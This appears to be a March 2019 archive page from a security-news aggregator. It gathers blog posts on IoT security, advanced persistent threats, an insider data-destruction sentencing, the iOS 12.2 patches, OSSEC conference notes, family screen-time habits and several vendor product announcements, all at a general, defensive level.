Monthly Archives: March 2019

How to Secure the Internet of Things

The Internet of Things (IoT) stands to have a tremendous impact on business – and life – as we know it. Gartner estimates that by 2020 the IoT will grow to 26 billion units installed, and IoT product and service suppliers will generate incremental revenue exceeding $300 billion, mostly in services. In the meantime, the cost of adding IoT capability to consumer products will gradually decrease, and connectivity will become ubiquitous. New industries will develop and old ones will disappear altogether or evolve into something entirely new. Society will be transformed as more data becomes available to us as consumers, enabling us to make informed decisions about how we live our daily lives.

The IoT will also have a significant impact on how we, as an industry, approach security. Security approached as an afterthought, or as layered preventive controls, will not suffice in the IoT. In order to fully benefit from all the IoT has to offer, companies must consider its security implications and address them early on. This blog introduces the security risks inherent in the IoT and how this new technology stack must be secured.

Going a step further, this product system is being integrated with other product systems to create a system of systems of which the farming equipment is just one component. It might also include a weather data system, a seed optimization system and an irrigation system, all of which feed into a farm management system. Thus, the competition within the farming industry is shifting from discrete products to product systems, while the farmers themselves gain a competitive advantage through increasing yield.

But that’s just the beginning. We have barely begun to scrape the surface of what’s possible by connecting smart devices.


The IoT Technology Stack

A new technology infrastructure is required to participate in the IoT. Companies must build, support and secure a new technology stack that begins with the endpoint – the ‘thing’ in the Internet of Things. This hardware may have embedded sensors and processors, as well as embedded software including an operating system, onboard software applications, a user interface and product controls.

The data collected by the endpoint’s sensors are transmitted over a communications network (often the Internet) to the cloud, where the data is managed in a big-data database system, and analyzed to optimize product operation and uncover new product insights. Additional applications that manage the monitoring, control, optimization and autonomous operation of product functions may also run in the cloud. External information sources, such as weather, traffic and prices, as well as business systems (ERP, CRM, etc.) may also be integrated at both the endpoint and cloud layers.


Security Risks Inherent to the IoT

As with any technology stack, there are a number of risks inherent to the IoT. Perhaps the most obvious relates to data privacy. The collection of vast amounts of customer and product data sparks concerns regarding its ownership, how the data is used, who has access to it, who is responsible for securing it, what constitutes sensitive data, what constitutes competitive intelligence and more. These questions need to be answered and data protected accordingly, as there is great opportunity for abuse – from insurance companies using personal health data to increase rates, to attackers stealing data to sell to the victim’s competitor. The IoT also forces companies to consider the new legal liabilities that arise from sharing data access with trading partners.

Algorithms are used to control endpoints in the IoT. Algorithms are rules that dictate the endpoint’s behavior based on environmental changes or changes in the product’s condition. For example, an algorithm might dictate that when the temperature reaches 70 degrees, the air conditioner turns on. Algorithms can be built into the endpoint itself or reside in the product cloud. Unfortunately, an error in an algorithm could have an effect ranging from a mere annoyance to catastrophic, depending on the application.

Embedded software on endpoint devices also poses a risk. Vulnerabilities can be exploited using malware and the devices used as bots to execute denial-of-service attacks. Attackers can potentially take over device functionality to, for example, intercept sensitive communications or even cause bodily harm in the case of health devices like pacemakers and insulin pumps, or automobiles.


Security Measures and Challenges

In order to help reduce these risks, security by design is required at every level of the IoT technology stack. The traditional development approach of quickly releasing a product and then adding security after the fact, in the form of patches, updates and preventive software, falls apart in the new world of the IoT. Users cannot be expected to download antivirus software for every smart connected device they own. Nor does it make sound business sense to deploy patches and other updates to disposable, lightweight devices. IoT devices must be built with security and privacy controls baked in. The FTC has developed guidelines for building security into the Internet of Things, which include security measures for protecting data at rest and in motion, preventing unauthorized access, and securing access between the endpoint’s technology stack and other enterprise systems.

Security efforts don’t get any easier as you move up the technology stack. The network must be protected against unauthorized access, and the data traversing the network must be properly encrypted to prevent sniffing. The cloud infrastructure and the third-party software running on it must be secured to prevent attackers from gaining access to endpoints through software vulnerabilities or weak configurations. Finally, user authentication and system access must be properly managed across the entire technology stack. This becomes a significant challenge in light of multiple stakeholders sharing interest in the assets and increasingly interconnected systems.


Service Providers Play a Key Role

ISPs and carriers play a key role in the IoT. IoT devices connect to the cloud over the ISP’s network. ISPs must undergo big changes to accommodate this, beginning with flattening their networks. Today, ISPs have limited visibility into the devices that sit behind Network Address Translation (NAT) home cable modems. ISPs are removing the NAT and adopting IPv6 in order to address all these devices and offer services on top. One of the key services that ISPs will offer is security. ISPs will want to differentiate by offering a safer, more secure way for the IoT world to operate.


Conclusion

It has taken the information technology industry more than a decade to recognize the need for a detect-and-respond approach to network security. Given the presence of advanced persistent threats and the value of data, we will not have the luxury of time with the IoT. A holistic approach to securing the IoT is necessary from the start, with an emphasis on detecting and responding.


What Are Advanced Persistent Threats (APTs)?

Advanced Persistent Threats (APTs) are a cybercrime category directed at business and political targets. APTs require a high degree of stealth over a prolonged duration of operation in order to be successful. The attack objectives typically extend beyond immediate financial gain, and compromised systems continue to be of service even after key systems have been breached and initial goals reached. APTs can best be summarized by their named requirements:

Advanced:

Criminal operators behind the threat utilize the full spectrum of computer intrusion technologies and techniques. While individual components of the attack may not be classed as particularly “advanced” (e.g. malware components generated from commonly available DIY construction kits, or the use of easily procured exploit materials), their operators can typically access and develop more advanced tools as required. They combine multiple attack methodologies and tools in order to reach and compromise their target.

Persistent:

Criminal operators give priority to a specific task, rather than opportunistically seeking immediate financial gain. This distinction implies that the attackers are guided by external entities. The attack is conducted through continuous monitoring and interaction in order to achieve the defined objectives. It does not mean a barrage of constant attacks and malware updates. In fact, a “low-and-slow” approach is usually more successful.

Threat:

Threat means that there is a level of coordinated human involvement in the attack, rather than a mindless and automated piece of code. 

How APTs Breach Enterprises

APTs breach enterprises through a wide variety of vectors, even in the presence of properly designed and maintained defense-in-depth strategies:

  • Internet-based malware infection
  • Physical malware infection
  • External exploitation


Well-funded APT adversaries do not necessarily need to breach perimeter security controls from an external perspective. They can, and often do, leverage “insider threat” and “trusted connection” vectors to access and compromise targeted systems.

Abuse and compromise of “trusted connections” is a key ingredient for many APTs. While the targeted organization may employ sophisticated technologies in order to prevent infection and compromise of their digital systems, criminal operators often tunnel into an organization using the hijacked credentials of employees or business partners, or remote offices. Almost any organization or remote site may fall victim to an APT and be utilized as a soft entry or information harvesting point.

Low and Slow Attacks

A key requirement for APTs (as opposed to an “every day” botnet) is to remain invisible for as long as possible. The criminal operators of APT technologies tend to focus on “low and slow” attacks – stealthily moving from one compromised host to the next, without generating regular or predictable network traffic – to hunt for their specific data or system objectives.

Tremendous effort is invested to ensure that malicious actions cannot be observed by legitimate operators of the systems.

Malware is a key ingredient in successful APT operations. Modern “off-the-shelf” and commercial malware openly available on the internet includes all of the features and functionality necessary to infect digital systems, hide from host-based detection systems, navigate networks, capture and exfiltrate key data, and provide video surveillance, along with silent and covert channels for remote control. If needed, APT operators can and will use custom-developed malware tools to achieve specific objectives and harvest information from non-standard systems.

Criminal Remote-Control

At the very heart of every APT lies remote control functionality. Criminal operators rely upon this capability in order to navigate to specific hosts within target organizations, exploit and manipulate local systems, and gain continuous access to critical information.

If an APT cannot connect with its criminal operators, then it cannot transmit any intelligence it may have captured. In effect, it has been neutered. This characteristic makes APTs appear as a sub-category of botnets. While APT malware can remain stealthy at the host level, the network activity associated with remote control is more easily identified.

APTs are most effectively identified, contained and disrupted at the network level.


Weekly Update 132

From last week's update in Seattle to home to Sydney to back home and a late update (again). But regardless, I'm committed to continuing the cadence of doing these updates each week and 132 of them in, I'm yet to miss a week.

This week it's a combination of more of the same (travel, events and data breaches), as well as more thoughts on the future of HIBP and Cloudflare's role when it comes to nasty content online. That last one in particular is a really tricky discussion and it's one that tends to come back to the surface after events that cause us to reflect on the nature of online speech that whilst legal, we all (well, almost all) just don't want being online. I'm not sure exactly what the answer is that allows us to have both the freedoms and safety we want, but I do think that acknowledging the issues on both sides of that debate is important. All that and more this week, next week will be another update from home and with any luck, one that puts me back on the usual Friday schedule.

References

  1. I've got a bunch of events coming in the US, Europe and Israel (that's a complete list of all the public 2019 events)
  2. I'm being inducted into the Infosecurity Hall of Fame in London (this is pretty cool, I'm really looking forward to the event in June!)
  3. Tens of millions of more records went into HIBP this week (the Twitter feed lists them all, including how many unique addresses were found)
  4. The Cloudflare issue around what they should censor is a really dicey one (that link goes back to issues with the Daily Stormer in 2017 and is worth re-reading in light of recent events)
  5. Varonis is this week's blog sponsor (check out their live cyber attack workshop)
  6. I've created a bunch of training for Varonis in the past you can access for free (ransomware, insider threats and GDPR, amongst other topics)

10 Ways to Help Your Family Break Bad Tech Habits

A new study from Pew Research confirms our collective hunch that 95% of teens now report they have a smartphone and that 45% of teens now say they are always online. No shock there. The finding that is far more worrisome? That despite this dramatic digital shift over the past decade, parents are divided on whether today’s teens face a set of issues completely different than the issues of their youth.

When asked to compare the experiences of today’s teens to their own experiences when they were a teen, 48% of parents surveyed said today’s teens have to deal with a completely different set of issues. Meanwhile, 51% said that despite some differences, the issues young people deal with today are not that different from when they were teenagers.

This number is alarming from both a parenting perspective and a digital safety perspective. It means that while we’ve made incredible progress in our digital awareness and how to raise kids in this unique culture, a lot of parents are still woefully behind in their thinking. (Seriously: Could our experience as teens — minus the internet and smartphones — be any more different than the experience of today’s digital natives?)

Distracted Parents, Distracted Kids

In trying to understand this reality gap, the survey offered up another morsel of insight: That parents themselves are as distracted as kids when it comes to reliance on devices. Yep! As worried as parents say they are about the amount of time their teen spends online, parents’ digital behavior isn’t exactly praiseworthy. The survey found that 59% of parents say they at least sometimes feel obligated to respond to cell phone messages immediately, while 39% admit they regularly lose focus at work because they’re checking their mobile device and 36% say they spend too much time on their cell phone.

Reality Check

If half of us genuinely believe that our kids are growing up with issues similar to ours as teens (only with strange devices in their hands), and if we are telling our kids to lead balanced digital lives but our digital habits are off the rails, then — if we’re honest — we’ve got some serious work to do as parents.

How do we begin to shift these numbers in favor of our family’s digital health? How do we move from technology leading our family to the other way around?

Like any significant change, we begin at home — with the truth — and move forward from there. We’ve got this!

10 Ways to Improve Your Family Tech Habits

  1. Own your stuff. Let’s get real. Change begins with acknowledging our personal responsibility in what isn’t working. If your own screen time is out of control and you are trying to set healthy digital habits for your family — that contradiction is going to undermine your success. Take a look at your screen time habits, admit to the bad habits, and establish fresh tech goals moving forward.
  2. No shame zone. We know about establishing device-free zones in the home such as the dinner table, movie time, and the bedroom at night. Consider a no shame zone — the understanding that no one is made to feel shame for his or her not-so-great tech habits. It’s hard to move forward toward new goals if we beat ourselves up for the past, compare ourselves to others, or are made to feel like the bad guy for falling short. Acknowledge bad habits, discuss them openly, and help one another do better in the future. Your chances of success double when you have a team supporting you.
  3. Stick to a device curfew. Try a device curfew — say 8 p.m. to 8 a.m. — when devices are turned off and put into a drawer (yes, you have to get this intentional). A curfew increases face-to-face family interaction and creates space for non-device activities. It specifically reduces the temptation to habitually check your phone, get lost scrolling on Instagram, and get sucked back into work emails. More importantly, it models for your kids that you don’t have to check your phone constantly, which has countless emotional and physical benefits.
  4. Be realistic with changes. The goal is to reduce your tech and strike a balance that complements — rather than conflicts with — your family’s lifestyle and wellbeing. We know that technology is now an ever-present part of family life, so cutting it out completely is neither beneficial nor realistic. Achieving a healthy tech balance is an on-going process. Some days you will fare better than others. The goal is to make progress (not perfection) toward a healthier, more balanced relationship with your technology. Going haywire with rules and consequences won’t get you there faster. Discuss as a family what changes need to be made and brainstorm ways to get there. Set some realistic goals that everyone can achieve and maintain not just in the short-term but also as a lifestyle.
  5. Turn off notifications. This is a small, powerful act that can transform your digital life. Getting pop-up notifications for apps, emails, texts, calendar events, social media actions — you name it — might be normal for you, but it is far from beneficial. So, turn them all off. I dare you.
  6. Filter content. Tech balance isn’t just about less tech; it’s also about monitoring the content that flows into your home from the other side of the screen. You can turn off your family’s devices for 23 hours a day, and if the content you allow into your home for that remaining one hour isn’t age-appropriate or conflicts with your family’s values and tech goals, then that one hour has tremendous influence. Take the time to explore filtering options that allow you to set time limits on your child’s (and your) technology, block dangerous websites and apps, and help you strike a healthy tech balance that reflects your family’s lifestyle and needs. Roll up your sleeves: Co-view movies, go through apps and video games, and discuss the issues that arise around the media your kids consume.
  7. Be the parent. Kids crave consistency and leadership from parents. No matter what age your child may be, as a parent, you are the most influential person in your child’s life. You pay the bills. You can shut devices and routers off — regardless of the tantrum level. Your opinion matters on video games, media, apps, friend groups, and content. Don’t let your child’s emotional protests keep you from parenting well and establishing and enforcing good tech habits. If you think your child has a technology addiction issue, trust that instinct and take action.
  8. Get a plan, work it. We all nod when we read this but who has done it? You can’t get where you are going without a map. Put a family tech plan in place (with group input) and stick to it. Ideas to consider: Phone free zones, device curfew, chores and responsibilities, physical activity vs. screen time, social media behavior, tech security rules, TV viewing time, video game time limits, content guidelines, and expectations. If you discover that your tech plan isn’t working, zero in and make adjustments.
  9. Rediscover real life — together. Maybe you’ve gotten in some bad habits over the years. Don’t beat yourself up. Just decide to change things up moving forward. It’s never too late to change your family vibe. Explore new things together — nature, art classes, concerts, camping — anything that helps you disconnect from technology and reconnect to each other and real life.
  10. Keep. On. Talking. Sure, you’ve said it before, so what? Make the conversation about digital issues a priority in your home. Ask your kids what’s going on with their friend groups and online. Talk about tech issues in the news. Talk about the health and emotional issues connected to excessive tech use. According to your child’s age, talk about the stuff that’s tough to talk about, like cyberbullying, suicide, self-harm, body image, and sexting. A good rapport with your child is the most powerful tool you have as a parent today.

Remember, technology is a tool, not a way of life. Healthy screen habits begin with parents who are grounded in reality and who model healthy screen habits themselves. Times have changed and there are challenges to be sure, but stay the course, parent: You’ve got the tools and the tenacity you need to get in front of those challenges and equip our kids to live wise, balanced digital lives.

The post 10 Ways to Help Your Family Break Bad Tech Habits appeared first on McAfee Blogs.

SENTENCED TO TWO YEARS IN JAIL FOR DESTROYING HIS FORMER EMPLOYER'S DATA

IN BRIEF: Steffan Needham, who served as an IT consultant at the UK company Voova, has been sentenced to 2 years in jail for destroying his former employer's data.
--------------------------------

According to Thames Valley Police in the United Kingdom, the suspect was dismissed by his employer and subsequently destroyed all of the company's critical data, in what has been interpreted as revenge for his dismissal.
The destruction of the data is estimated to have cost the company six hundred and fifty thousand dollars (US$650,000), and also led to several employees losing their jobs.

The suspect was sentenced under the UK's computer crime law (the Computer Misuse Act).

Furthermore, the company was found to have shortcomings in failing to have robust strategies for protecting its data, including the use of more than one method of verification (multi-factor authentication) when a user wants to log in to its systems, and ensuring that deletion of data in the system involves more than one person.

Companies are advised to take serious precautions in protecting their data in order to guard against malicious/disgruntled insiders who could cause disaster later on.

Meanwhile, a court in the United States has granted Microsoft permission to take down approximately 99 websites associated with phishing attacks.

Tom Burt, from Microsoft, explained that the operation that disrupted and took down those 99 websites involved other large companies such as Yahoo and others.

Android Security & Privacy Year in Review 2018: Keeping two billion users, and their data, safe and sound


We're excited to release today the 2018 Android Security and Privacy Year in Review. This year's report highlights the advancements we made in Android throughout the year, and how we've worked to keep the overall ecosystem secure.
Our goal is to be open and transparent in everything we do. We want to make sure we keep our users, partners, enterprise customers, and developers up to date on the latest security and privacy enhancements in as close to real-time as possible. To that end, in 2018 we prioritized regularly providing updates through our blogs and our new Transparency Reports, which give a quarterly ecosystem overview. In this year-in-review, you'll see fewer words and more links to relevant articles from the previous year. Check out our Android Security Center to get the latest on these advancements.
In this year's report, some of our top highlights include:
  • New features in Google Play Protect
  • Ecosystem and Potentially Harmful Application family highlights
  • Updates on our vulnerability rewards program
  • Platform security enhancements
We're also excited to have Dave Kleidermacher, Vice President of Android Security and Privacy, give you a rundown of the highlights from this report. Watch his video below to learn more.

Thoughts on OSSEC Con 2019

Last week I attended my first OSSEC conference. I first blogged about OSSEC in 2007, and wrote other posts about it in the following years.

OSSEC is a host-based intrusion detection and log analysis system with correlation and active response features. It is cross-platform, such that I can run it on my Windows and Linux systems. The moving force behind the conference was a company local to me called Atomicorp.

In brief, I really enjoyed this one-day event. (I had planned to attend the workshop on the second day but my schedule did not cooperate.) The talks were almost uniformly excellent and informative. I even had a chance to talk jiu-jitsu with OSSEC creator Daniel Cid, who despite hurting his leg managed to travel across the country to deliver the keynote.

I'd like to share a few highlights from my notes.

First, I had been worried that OSSEC was in some ways dead. I saw that the Security Onion project had replaced OSSEC with a fork called Wazuh, which I learned is apparently pronounced "wazoo." To my delight, I learned OSSEC is decidedly not dead, and that Wazuh has been suffering stability problems. OSSEC has a lot of interesting development ahead of it, which you can track on their Github repo.

For example, the development roadmap includes eliminating Logstash from the pipeline used by many OSSEC users. OSSEC would feed directly into Elasticsearch. One speaker noted that Logstash has a 1.7 GB memory footprint, which astounded me.

On a related note, the OSSEC team is planning to create a new Web console, with a design goal to have it run in an "AWS t2.micro" instance. The team noted that instance offers 2 GB memory, which doesn't match what AWS says. Perhaps they meant t2.micro and 1 GB memory, or t2.small with 2 GB memory. I think they mean t2.micro with 1 GB RAM, as that is the free tier. Either way, I'm excited to see this later in 2019.

Second, I thought the presentation by security personnel from USA Today offered an interesting insight. One design goal they had for monitoring their Google Cloud Platform (GCP) was to not install OSSEC on every container or on Kubernetes worker nodes. Several times during the conference, speakers noted that the transient nature of cloud infrastructure is directly antithetical to standard OSSEC usage, whereby OSSEC is installed on servers with long uptime and years of service. Instead, USA Today used OSSEC to monitor HTTP logs from the GCP load balancer, logs from Google Kubernetes Engine, and monitored processes by watching output from successive kubectl invocations.

Third, a speaker from Red Hat brought my attention to an aspect of containers that I had not considered. Docker and containers had made software testing and deployment a lot easier for everyone. However, those who provide containers have effectively become Linux distribution maintainers. In other words, who is responsible when a security or configuration vulnerability in a Linux component is discovered? Will the container maintainers be responsive?

Another speaker emphasized the difference between "security of the cloud," offered by cloud providers, and "security in the cloud," which is supposed to be the customer's responsibility. This makes sense from a technical point of view, but I expect that in the long term this differentiation will no longer be tenable from a business or legal point of view.

Customers are not going to have the skills or interest to secure their software in the cloud, as they outsource ever more technical talent to the cloud providers and their infrastructure. I expect cloud providers to continue to develop, acquire, and offer more security services, and accelerate their competition on a "complete security environment."

I look forward to more OSSEC development and future conferences.

3 Ways Small Organizations Can Take a Proactive Approach to Security

While most large enterprises have recognized the value in taking a proactive approach to security, many smaller organizations may not yet realize that they are also a target for cybercriminals. As a result, these organizations’ primary security strategy consists of waiting until an incident occurs to react, with minimal to no preventative security measures in place.

This makes small organizations a prime target for cyber criminals, with 58% of cyberattacks targeted at small businesses, according to the Verizon DBIR.

The problem is that this reactive approach often results in severe remediation and forensics costs, as well as substantial brand and reputation damage.

This has a significant effect on any business that is breached, but unlike larger organizations, smaller businesses often have a harder time recovering from the damage caused.  Many of these small businesses don’t recover at all, with 60% of small organizations going out of business within six months of suffering a cyberattack. 

When you take into consideration the growing frequency of small businesses that are breached and the rising costs of these breaches, it makes sense that taking a proactive approach to security can actually save you money in the long run.

So, what exactly does a proactive cybersecurity strategy consist of?

1.  Identifying your greatest vulnerabilities with Security Assessments.

The first step in proactively protecting your organization is understanding what exactly needs protecting. This can be accomplished in a security assessment to understand and identify your greatest weaknesses — before an adversary does.

These assessments could take the form of a Network Security & Architecture Review or a Penetration Test.  They are designed to find weaknesses in your security policies, network design, and device configurations and rules.

As an extra benefit, these assessments help you prioritize where to focus your budget.  This is a great way to get your executives on board, whose support is critical when gaining budget for other proactive measures.

2.  Monitoring your network continuously with a Managed Security Service Provider.

One of the best ways to proactively detect incidents is to have eyes on your network 24/7/365.  This can be done through a managed security services provider (MSSP), which will continuously monitor your endpoints and alert you when there is suspicious activity on your network.  The MSSP staff will also provide you with detailed recommended remediations so you can strengthen your network and prevent future incidents.

Although the cost of an MSSP may be comparable to hiring an internal employee, the value you receive from an MSSP is far greater than one person can offer.  Unlike a single employee, an MSSP offers you varied areas of expertise, access to technology, and around-the-clock coverage. 

3.  Reducing incidents resulting from human error with Security Awareness Training.

With human error accounting for 27% of cybersecurity incidents (Ponemon Institute), providing your staff with security awareness training is one of the most critical and budget-friendly proactive measures you can take.

This training should include secure password training, phishing campaigns, and secure travel training.  Be sure to incorporate this training into the onboarding process and include regular refreshers to ensure your staff is up-to-date and you are fostering a culture of cyber awareness.

By taking the necessary steps to implement proactive security measures, you can save money on costly breaches, and possibly even save your business.

Not sure where to start? Contact us for a complimentary security assessment.

The post 3 Ways Small Organizations Can Take a Proactive Approach to Security appeared first on GRA Quantum.

Block Web Attacks On Your Phone Using The New Cloudbric Console App

Cloudbric Console App is now out and available for Android and iOS.

When we ask our users what they most like about Cloudbric’s services, the intuitive dashboard and the functionality of our console are usually the top picks.

We make it easy for users to simply login and view their security status without complications, as Cloudbric protection runs in the background.

Now, with the release of our first ever mobile application, it’s become even easier to access Cloudbric’s services and for users to monitor their websites via their smartphones.  

Cloudbric’s new service console app was developed with the goal of providing users greater control and visibility while on the go, allowing users to receive updates via push notifications anytime and anywhere.

With its simple user interface, users can access their information and site settings, track their traffic usage, and check on the progress of their site registration just as they would on their PCs.

Users instantly get notifications of attacks on their sites and receive push alerts when a website reaches 80% and 100% of its traffic limit, enabling a quick response.

Typically, administrators, developers, or IT personnel can only monitor web attacks or resolve certain issues, such as blacklisting and whitelisting IPs, via their dashboard on the web. Now, the console app will allow IT personnel to resolve these issues and do everything administratively via the dashboard on mobile.

So whether you’re managing one site or twenty sites, the new console app will make viewing your security status easy.

But it doesn’t end there: Cloudbric’s development team is currently building a drop-down menu for integrating deep learning security (available in Q2).

A step further in bringing blockchain and security together, Cloudbric will also roll out a crypto wallet that will serve as an add-on for users who own CLB or any other crypto to safely store, transfer, and manage it.

Cloudbric’s console service app is now available for download on Google Play and the App Store.

Google Play and the Google Play logo are trademarks of Google LLC.

Apple, the Apple logo, iPhone, and iPad are trademarks of Apple Inc., registered in the U.S. and other countries and regions. App Store is a service mark of Apple Inc.

Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Block Web Attacks On Your Phone Using The New Cloudbric Console App appeared first on Cloudbric.

iOS Users: Update Your Software to Avoid Security Vulnerabilities

On Monday, Apple made some bold announcements at its keynote event, including new subscription offerings for news, television, and video games, and a credit card service. While those announcements got the attention, the release of iOS 12.2 seemed to slip under the radar. This update contains 51 different security fixes and covers the iPhone 5s and later and the iPad Air and later, with a companion update for devices running tvOS. These patches cover a variety of bugs that cybercriminals could use to cause a denial of service, overwrite arbitrary files, or execute malicious code.

The iOS 12.2 update includes patches for vulnerabilities in core apps like Contacts, FaceTime, Mail, Messages, and more. According to security professional Alex Stamos, most of the vulnerabilities were found in WebKit, the browser engine Apple uses in many of its products, including Safari, Mail, and the App Store. Because every browser on iOS is required to use WebKit, a bug in it is reachable through any browser on the device, not just Safari. Among these vulnerabilities were memory corruption bugs that could lead to arbitrary code execution, in which an attacker runs code of their choosing inside the vulnerable process; for a browser engine, that can mean a malicious web page is enough to read the victim’s files or, chained with other bugs, to take over the device remotely. Apple’s advisory describes these fixes as improved memory handling and state management. Another issue patched by this update allowed a cybercriminal to bypass sandbox restrictions, which confine each app to the resources it needs so that compromised or suspicious code cannot reach the rest of the system; Apple addressed it with improved validation checks.

While it can be easy to click the “Remind Me Later” option when you receive a software update notification, the security updates included in iOS 12.2 should not be overlooked. To help keep your iOS devices protected and running smoothly, check out the following tips:

  • Update your software. To update your device to iOS 12.2, go to your Settings, then to General, and then click Software Update. From there, you will be able to download and install the update and patch over 50 security holes.
  • Turn on automatic updates. Turning on automatic updates helps shield you from exposure to threats brought on by software bugs and vulnerabilities. You can enable automatic updates in your Settings as well.
  • Use a security solution. To add an extra layer of protection to all your devices, install a security solution like McAfee Total Protection. This will allow you to have an extra security weapon and help defend your devices from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iOS Users: Update Your Software to Avoid Security Vulnerabilities appeared first on McAfee Blogs.

DMitry Deepmagic information Gathering Tool Kali Linux

DMitry (Deepmagic Information Gathering Tool) is an open source Linux CLI tool developed by James Greig and written in C. DMitry is a powerful information gathering tool that aims to gather as much information about a host as possible. Features include subdomain search, email addresses, uptime information, […]

The post DMitry Deepmagic information Gathering Tool Kali Linux appeared first on HackingVision.

How to Enable Facebook White Hat Researcher Setting

Facebook has implemented a white hat security testing setting that allows its users to test security over various Facebook services.   Facebook will knowingly break its certificate pinning mechanism for users who enable the white hat settings. Pinning is used to improve security of a website […]

The post How to Enable Facebook White Hat Researcher Setting appeared first on HackingVision.

From Mobile and ISP to Endpoint Engineering: Undergoing a Role Transition in the Security Industry

The technology around us is constantly changing, and cybersecurity practices are evolving to match these new innovations. As the cybersecurity landscape shifts to meet the needs presented by new technology, opportunities arise for cybersecurity professionals to step into new roles – an experience I recently underwent myself. I have shifted from McAfee’s Mobile and ISP Business Unit to our Enterprise Endpoint Engineering team, a transition that has given me the opportunity to leverage what I’ve learned in the industry and step forward as a leading woman in tech.

Through this process, I’ve seen first-hand how growth opportunities within the cybersecurity field are beneficial for both individuals and the future of the security industry as well. For example, my transition allows me to apply my past experience and knowledge to a new area of security. Previously, I specialized in engineering solutions that protected mobile, IoT, and smart home devices. However, with my transition into this new role, I am still protecting individual endpoint devices, but rather in a new type of environment — an organization’s network.

Just like the ever-growing number of IoT devices connecting to users’ home networks, endpoint devices are popping up everywhere in corporate networks these days. As we add more endpoint devices to corporate networks, there is a growing need to ensure their security.  Endpoint security, or endpoint protection, refers to the systems that protect computers and other devices on a network or in the cloud from security threats. End-user devices such as smartphones, laptops, tablets, and desktop PCs are all classified as endpoints, and these devices are all now rapidly connecting to an organization’s network with every employee, partner, and client that enters the building. That’s why it’s imperative companies prioritize a robust and agile endpoint security strategy so that all of their network users can connect with confidence. Similar to securing all the personal devices on a home network, it’s a sizable challenge to secure all corporate endpoints. And my new team, the McAfee Enterprise Endpoint Engineering group, is here to help with exactly that.

Leading consumer engineering taught me how to make security simple for a home user to consume: how to protect what matters to a user without them needing to be an expert on the threat landscape, or on the vulnerabilities, breaches and campaigns around devices, data, cloud and network. This is something I plan to bring to the new role. Leading a business unit focused on delivering security through mobile carriers and ISPs taught me the strength of bringing together an ecosystem, both on technology and on the channel, to solve end users’ security needs in a holistic way. That ecosystem view is another thing I bring to this role, besides leading engineering from the lens of growing the business.

This transition is not only exciting from a personal perspective but also because it is a testament to the progress that is being seen across the cybersecurity industry as a whole. There’s a lot to be said about the vast opportunities that the cybersecurity field has to offer, especially for women looking to build a career in the field. Cybercriminals and threat actors often come from diverse backgrounds. The wider the variety of people we have defending our networks, the better our chances of mitigating cyberthreats. From there, we’ll put ourselves in the best position possible to create change – not only within the industry but within the threat landscape as a whole.

The post From Mobile and ISP to Endpoint Engineering: Undergoing a Role Transition in the Security Industry appeared first on McAfee Blogs.

Social Media: Where Cybercrime Lurks in the Shadows

When you think of cybercrime, the first thing that comes to mind is most likely cybercriminals operating on the dark web. Last year, however, cybercriminals made the jump over to social media and cashed in big – $3 billion worth, as a matter of fact. With approximately 2.77 billion people using one social media account or more, it’s no wonder these bad actors have followed the masses. While the average user distrusts the dark web, they do trust their chosen social media platforms. Whether it’s sharing birthdates or a current location, or accepting a follow or message request from strangers, users in front of a screen feel secure. But as the line between social platforms and the dark web blurs, what happens behind the screen is the real issue.

Since 2017, cryptomining malware has exploded on a global scale, with over half of the identified strains found on social media sites. Utilizing apps, advertisements, and malicious links, cybercriminals were able to deliver these attacks and earn $250 million per year. Not only are social media platforms being used to distribute cryptomining malware, but they are also a major source for spreading other types of malware – malvertisements, faulty plug-ins, and apps – that draw users in by offering “too good to be true” deals. Once clicked, the malware is delivered. From there, cybercriminals can obtain data, install keyloggers, dispense ransomware, and lurk in the shadows of social media accounts waiting for the next opportunity.

That next opportunity could also be on a completely different social media platform, as these sites unknowingly make it easier for malware to spread from one site to another. Many social media accounts are linked across platforms, which enables “chain exploitation,” where malware jumps from one account to the next.

In short, social media is a cash cow for cybercriminals, and they are showing no sign of slowing down. What it really comes down to is social platforms, like Instagram and Facebook, attract a significant number of users and are going to draw in a criminal component too. However, if you take the proper security precautions ahead of time, you can fight off bad actors and continuously scroll with confidence. Here are some tips to help you get started:

  • Limit the amount of personal information shared in the first place. Avoid posting home addresses, full birth dates, and employer information, as well as exact location details of where you are.
  • Be wary of messages and follow requests from strangers. Avoid clicking on links sent by someone you don’t know personally.
  • Report any spam posts or messages you encounter to the social media platform. Then they can stop the threat from spreading to other accounts.
  • Always use comprehensive security software. To help protect you from viruses, spyware, and other digital threats that may emerge from social media sites, consider McAfee Total Protection or McAfee Mobile Security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Social Media: Where Cybercrime Lurks in the Shadows appeared first on McAfee Blogs.

The Ultimate CyberParenting Hack – Managing Your Family’s Cybersafety with the help of your Wi-Fi Router!

Managing your family’s cybersafety can often feel overwhelming. But one thing I have learnt in my 22 years of parenting is that there are no silver bullets for any parenting issues. Whether it’s toilet training or driver training, it takes time and often a combination of strategies. Teaching your kids about online safety is no different. Yes, you need to put in the hard work and continue to have the conversations. BUT if it was possible to supplement the talking with some strategic parental controls and an automatic layer of cybersecurity, then I would consider that to be a parenting no brainer!

Well, this parenting no-brainer exists. Let me introduce you to D-Link’s latest D-Fend router, which includes not only McAfee’s Secure Home Platform, which automatically protects all your Wi-Fi connected devices, but some pretty impressive parental controls too. And all this happens while users get fast wireless connectivity with increased range and reliability. Awesome!

Being a First-Generation Digital Parent Is A Tough Gig

As a generation of parents, I believe we are the busiest yet. Not only are we juggling our brood of kids and their lives but many of us are also managing ageing parents, plus our own careers, relationships and social lives. And just to complicate things a little further, we are also the first generation of digital parents. Managing our kids and their fleet of devices comes with no guidebook or tried and tested generational wisdom, which makes our job even more complex. How easy did my parents have it – all they had to do was buy the Atari console in the 80’s!

But the job of a digital parent is only set to become more complex with Gartner estimating that by 2020 there will be 20.4 billion IoT devices operating in our world.

Many Parents Don’t Know Where To Start With Cyber Safety At Home

When I speak with parents about how they manage their kids and devices, there is a recurring theme – many parents know they need to be doing something to protect their kids from online risks, but they often don’t know where to start. As a result, nothing often happens. Research from McAfee confirms this too with almost a third of Aussies taking no steps at all to install security protection on either their own or their kids’ internet connected devices.

But there is no doubt that many parents are concerned about the risks. Research by Life Education in partnership with Hyundai Help for Kids shows that an overwhelming 95% of Aussie parents rated online safety as a very important issue which is very encouraging.

